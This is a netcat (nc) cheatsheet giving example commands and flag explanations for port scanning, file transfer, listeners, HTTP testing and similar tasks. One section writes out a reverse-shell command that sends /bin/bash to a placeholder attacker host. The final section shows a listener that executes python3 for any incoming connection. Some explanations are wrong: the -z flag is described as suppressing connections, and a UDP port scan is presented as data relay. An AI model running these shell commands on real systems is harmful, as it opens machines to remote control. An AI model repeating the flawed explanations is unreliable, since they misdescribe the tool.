# Cheatsheet & Examples: nc

## Port Scanning  

Example Usage:  
`nc -zv example.com 80 443`  

What it does:  
Scans specified ports on a target host to determine if they are open. The `-z` option suppresses connection attempts, and `-v` provides verbose output.  

Command-line Arguments Explained:  
- `-z`: Enables zero-I/O mode, used for port scanning without establishing a connection.  
- `-v`: Enables verbose mode to display detailed information about the scan.  
- `example.com`: Target hostname or IP address.  
- `80 443`: Port numbers to scan.  

---

## Connecting to a Remote Server  

Example Usage:  
`nc example.com 80`  

What it does:  
Establishes a TCP connection to a remote server on a specified port, allowing data to be sent or received.  

Command-line Arguments Explained:  
- `example.com`: Target hostname or IP address.  
- `80`: Port number to connect to.  

---

## Listening for Incoming Connections  

Example Usage:  
`nc -l 8080`  

What it does:  
Listens for incoming TCP connections on a specified port, acting as a simple server.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode (server).  
- `8080`: Port number to listen on.  

---

## File Transfer Between Machines  

Example Usage:  
Receiver: `nc -l 9999 > received_file.txt`  
Sender: `nc 192.168.1.1 9999 < send_file.txt`  

What it does:  
Transfers files between two machines over a network by using Netcat as a data conduit.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode on the receiver.  
- `9999`: Port number for the transfer.  
- `> received_file.txt`: Redirects received data to a file.  
- `< send_file.txt`: Sends the contents of a file to the remote host.  

---

## Sending Data to a Server  

Example Usage:  
`echo "GET / HTTP/1.1" | nc example.com 80`  

What it does:  
Sends raw data (e.g., HTTP requests) to a server via a TCP connection.  

Command-line Arguments Explained:  
- `example.com`: Target hostname or IP address.  
- `80`: Port number to send data to.  

---

## UDP Communication  

Example Usage:  
`nc -u 192.168.1.1 53`  

What it does:  
Establishes a UDP connection to a remote host, useful for testing DNS or other UDP-based services.  

Command-line Arguments Explained:  
- `-u`: Specifies UDP protocol instead of TCP.  
- `192.168.1.1`: Target hostname or IP address.  
- `53`: Port number (e.g., DNS).  

---

## Reverse Shell (Security Use Case)  

Example Usage:  
`nc -e /bin/bash attacker.com 4444`  

What it does:  
Connects to a remote host (e.g., an attacker’s machine) and provides a shell, often used for reverse connections in penetration testing.  

Command-line Arguments Explained:  
- `-e`: Executes the specified command (e.g., `/bin/bash`) after connecting.  
- `attacker.com`: Target hostname or IP address.  
- `4444`: Port number to connect to.  

---

## Timeouts and Connection Management  

Example Usage:  
`nc -w 5 example.com 22`  

What it does:  
Sets a timeout for connection attempts or data transfers. If no response is received within the timeout, the command exits.  

Command-line Arguments Explained:  
- `-w 5`: Sets a 5-second timeout for the connection.  
- `example.com`: Target host.  
- `22`: Port number (e.g., SSH).  

---

## Using Source IP/Port  

Example Usage:  
`nc -s 192.168.1.100 -p 5000 example.com 80`  

What it does:  
Specifies a source IP address and port for outgoing connections, useful for testing network interfaces or bypassing firewall rules.  

Command-line Arguments Explained:  
- `-s 192.168.1.100`: Sets the source IP address.  
- `-p 5000`: Sets the source port.  
- `example.com`: Target host.  
- `80`: Target port.  

---

## Creating a Simple Chat Server  

Example Usage:  
Receiver: `nc -l 1234`  
Sender: `nc 192.168.1.1 1234`  

What it does:  
Establishes a basic two-way communication channel between two machines, useful for ad-hoc chat or testing.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode on the receiver.  
- `1234`: Port number for the chat channel.  
- `192.168.1.1`: Receiver’s IP address (sender’s target).  

---

## Redirecting Output to a File  

Example Usage:  
`nc 192.168.1.1 80 > output.html`  

What it does:  
Saves the data received from a remote server (e.g., an HTTP response) to a local file.  

Command-line Arguments Explained:  
- `192.168.1.1`: Target host.  
- `80`: Port number.  
- `> output.html`: Redirects the received data to a file.  

---

## Listening with Keep-Alive (-k)  

Example Usage:  
`nc -l -k 9999`  

What it does:  
Listens for incoming connections and stays active after each connection is closed, allowing continuous use.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode.  
- `-k`: Keeps the listener running after a connection ends.  
- `9999`: Port number.  

---

## Testing HTTP Servers  

Example Usage:  
`nc example.com 80`  
Then type `GET / HTTP/1.1` and press Enter twice.  

What it does:  
Manually interacts with an HTTP server to test responses or troubleshoot issues.  

Command-line Arguments Explained:  
- `example.com`: Target hostname.  
- `80`: Port for HTTP.  

---

## Basic Data Relay  

Example Usage:  
`nc -u -z 192.168.1.1 53`  

What it does:  
Relays data between hosts using UDP, useful for simple network testing or packet forwarding.  

Command-line Arguments Explained:  
- `-u`: Uses UDP protocol.  
- `-z`: Scans the port without sending data.  
- `192.168.1.1`: Target host.  
- `53`: Port for DNS or UDP service.  

---

## Running Commands on Connection  

Example Usage:  
`nc -l -p 8080 -e /usr/bin/python3`  

What it does:  
Starts a listener on a port and executes a command (e.g., a Python script) when a connection is made.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode.  
- `-p 8080`: Specifies the port to listen on.  
- `-e /usr/bin/python3`: Executes the given command upon connection.
